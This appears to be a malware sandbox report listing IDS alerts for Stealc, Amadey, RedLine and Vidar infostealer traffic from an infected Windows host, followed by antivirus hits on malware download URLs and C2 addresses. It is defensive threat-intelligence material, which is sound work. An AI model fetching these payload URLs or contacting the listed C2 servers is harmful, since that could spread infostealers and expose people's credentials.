Timestamp:	2024-07-26T17:58:47.387169+0200
SID:	2028765
Source Port:	55881
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:56:06.087522+0200
SID:	2011803
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Executable code was detected

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:56:04.072888+0200
SID:	2044245
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:57:58.539633+0200
SID:	2028765
Source Port:	61420
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:56:49.404238+0200
SID:	2022930
Source Port:	443
Destination Port:	61178
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M3 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-07-26T18:02:05.568048+0200
SID:	2856147
Source Port:	56377
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T17:57:05.139751+0200
SID:	2803305
Source Port:	61181
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-07-26T17:57:10.337457+0200
SID:	2044696
Source Port:	61187
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T17:57:22.850976+0200
SID:	2044243
Source Port:	61238
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 5.75.212.60 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:58:07.387205+0200
SID:	2011803
Source Port:	443
Destination Port:	61485
Protocol:	TCP
Classtype:	Executable code was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:28.046187+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T17:56:12.578232+0200
SID:	2803304
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:56:05.997408+0200
SID:	2011803
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Executable code was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T17:56:22.035871+0200
SID:	2803304
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:32.442571+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-07-26T17:57:07.703131+0200
SID:	2044696
Source Port:	61183
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M3 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T17:57:03.887649+0200
SID:	2856147
Source Port:	61179
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:30.099477+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE UTF-8/16 Encoded Shellcode - Source IP: 142.250.186.163 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:57:53.078925+0200
SID:	2012510
Source Port:	443
Destination Port:	61354
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Amadey CnC Response M1 - Source IP: 185.215.113.16 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:57:04.154635+0200
SID:	2856122
Source Port:	80
Destination Port:	61179
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T17:56:04.257921+0200
SID:	2044246
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) - Source IP: 185.215.113.9 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:57:19.789071+0200
SID:	2046056
Source Port:	9137
Destination Port:	61197
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:21.395912+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:24.605351+0200
SID:	2028765
Source Port:	55759
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:56:07.031768+0200
SID:	2009080
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T17:57:15.109701+0200
SID:	2044696
Source Port:	61201
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T17:57:08.531884+0200
SID:	2803305
Source Port:	61184
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:32.194077+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile - Source IP: 185.215.113.16 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:57:05.563610+0200
SID:	2009080
Source Port:	80
Destination Port:	61181
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T17:56:17.107939+0200
SID:	2803304
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:39.485635+0200
SID:	2028765
Source Port:	55845
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:57:57.329275+0200
SID:	2028765
Source Port:	61390
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T17:57:08.769829+0200
SID:	2044243
Source Port:	61185
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:30.350748+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M3 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T18:00:27.231398+0200
SID:	2856147
Source Port:	56131
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:05.374501+0200
SID:	2028765
Source Port:	61485
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:56:14.736297+0200
SID:	2009080
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:28.406356+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:57:59.900758+0200
SID:	2028765
Source Port:	61433
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T17:56:03.813470+0200
SID:	2044243
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:30.606464+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE UTF-8/16 Encoded Shellcode - Source IP: 34.149.100.209 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:58:32.568055+0200
SID:	2012510
Source Port:	443
Destination Port:	55811
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Win32/Stealc Submitting System Information to C2 - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T17:56:05.297445+0200
SID:	2044248
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:30.159676+0200
SID:	2028765
Source Port:	55797
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T17:56:05.855393+0200
SID:	2803304
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:04.461907+0200
SID:	2028765
Source Port:	61477
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:56:06.364179+0200
SID:	2011803
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Executable code was detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 5.75.212.60 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:58:29.243498+0200
SID:	2011803
Source Port:	443
Destination Port:	55789
Protocol:	TCP
Classtype:	Executable code was detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:56:05.990497+0200
SID:	2011803
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Executable code was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:23.534927+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:23.702141+0200
SID:	2028765
Source Port:	55752
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:16.311006+0200
SID:	2028765
Source Port:	61512
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:30.861034+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T17:57:10.353656+0200
SID:	2803305
Source Port:	61186
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 185.215.113.9 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:57:14.133397+0200
SID:	2043234
Source Port:	9137
Destination Port:	61197
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M3 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-07-26T18:01:11.800386+0200
SID:	2856147
Source Port:	56245
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE UTF-8/16 Encoded Shellcode - Source IP: 34.149.100.209 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:58:32.567966+0200
SID:	2012510
Source Port:	443
Destination Port:	55811
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET SHELLCODE UTF-8/16 Encoded Shellcode - Source IP: 34.149.100.209 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:58:23.340117+0200
SID:	2012510
Source Port:	443
Destination Port:	55750
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:33.224861+0200
SID:	2028765
Source Port:	55813
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T17:56:19.618658+0200
SID:	2803304
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:34.530207+0200
SID:	2028765
Source Port:	55822
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:21.135953+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:37.198218+0200
SID:	2028765
Source Port:	55833
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:21.837906+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE UTF-8/16 Encoded Shellcode - Source IP: 34.149.100.209 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:58:32.565877+0200
SID:	2012510
Source Port:	443
Destination Port:	55811
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Amadey CnC Activity M3 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.19

Timestamp:	2024-07-26T18:00:58.215581+0200
SID:	2856147
Source Port:	56209
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T17:56:13.405600+0200
SID:	2803304
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:02.661072+0200
SID:	2028765
Source Port:	61468
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET SHELLCODE UTF-8/16 Encoded Shellcode - Source IP: 34.149.100.209 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:58:23.343485+0200
SID:	2012510
Source Port:	443
Destination Port:	55750
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:42.177889+0200
SID:	2028765
Source Port:	55857
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET SHELLCODE UTF-8/16 Encoded Shellcode - Source IP: 34.149.100.209 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:58:23.250893+0200
SID:	2012510
Source Port:	443
Destination Port:	55750
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 - Source IP: 5.75.212.60 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:58:03.313724+0200
SID:	2051831
Source Port:	443
Destination Port:	61468
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:25.619254+0200
SID:	2028765
Source Port:	55772
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T17:56:16.713549+0200
SID:	2803304
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:40.827965+0200
SID:	2028765
Source Port:	55850
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:56:21.224649+0200
SID:	2022930
Source Port:	443
Destination Port:	49706
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:31.112371+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:56:14.224444+0200
SID:	2009080
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile - Source IP: 185.215.113.16 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:57:12.913756+0200
SID:	2009080
Source Port:	80
Destination Port:	61186
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:46.107776+0200
SID:	2028765
Source Port:	55874
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:44.249160+0200
SID:	2028765
Source Port:	55867
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:56:16.321382+0200
SID:	2009080
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:20.655179+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE UTF-8/16 Encoded Shellcode - Source IP: 34.149.100.209 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:58:23.340512+0200
SID:	2012510
Source Port:	443
Destination Port:	55750
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:23.803795+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T17:56:04.031471+0200
SID:	2044244
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:56:05.909946+0200
SID:	2011803
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Executable code was detected

ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:13.871102+0200
SID:	2046045
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Vidar Stealer Form Exfil - Source IP: 192.168.2.5 - Destination IP: 77.91.101.71

Timestamp:	2024-07-26T17:58:48.904442+0200
SID:	2054495
Source Port:	55885
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config - Source IP: 5.75.212.60 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:58:01.953130+0200
SID:	2044247
Source Port:	443
Destination Port:	61453
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T17:56:14.978485+0200
SID:	2803304
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:31.773509+0200
SID:	2028765
Source Port:	55806
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T17:57:04.394039+0200
SID:	2803305
Source Port:	61179
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:32.741788+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Response M1 - Source IP: 185.215.113.19 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:57:06.518269+0200
SID:	2856122
Source Port:	80
Destination Port:	61180
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.5 - Destination IP: 85.28.47.31

Timestamp:	2024-07-26T17:57:38.438713+0200
SID:	2044243
Source Port:	61290
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:56:05.997773+0200
SID:	2011803
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Executable code was detected

ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile - Source IP: 185.215.113.16 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:57:12.910866+0200
SID:	2009080
Source Port:	80
Destination Port:	61186
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:56:04.330075+0200
SID:	2044247
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T17:57:07.701592+0200
SID:	2044696
Source Port:	61182
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:28.401024+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET ACTIVEX COM Object Instantiation Memory Corruption Vulnerability MS05-054 - Source IP: 85.28.47.31 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:56:14.224510+0200
SID:	2002725
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T17:57:08.010791+0200
SID:	2803305
Source Port:	61182
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.5 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T17:58:28.403781+0200
SID:	2028765
Source Port:	55789
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET SHELLCODE UTF-8/16 Encoded Shellcode - Source IP: 142.250.181.227 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T17:58:02.692832+0200
SID:	2012510
Source Port:	443
Destination Port:	61461
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Redline Stealer TCP CnC Activity - Source IP: 192.168.2.5 - Destination IP: 185.215.113.9

Timestamp:	2024-07-26T17:57:29.769531+0200
SID:	2043231
Source Port:	61197
Destination Port:	9137
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://185.215.113.19/Vi9leo/index.php	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll;	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/nss3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/sqlite3.dlleZ2B	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dllk	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/5499d72b3a3e55be.phposition:	Avira URL Cloud: Label: malware

Found malware configuration

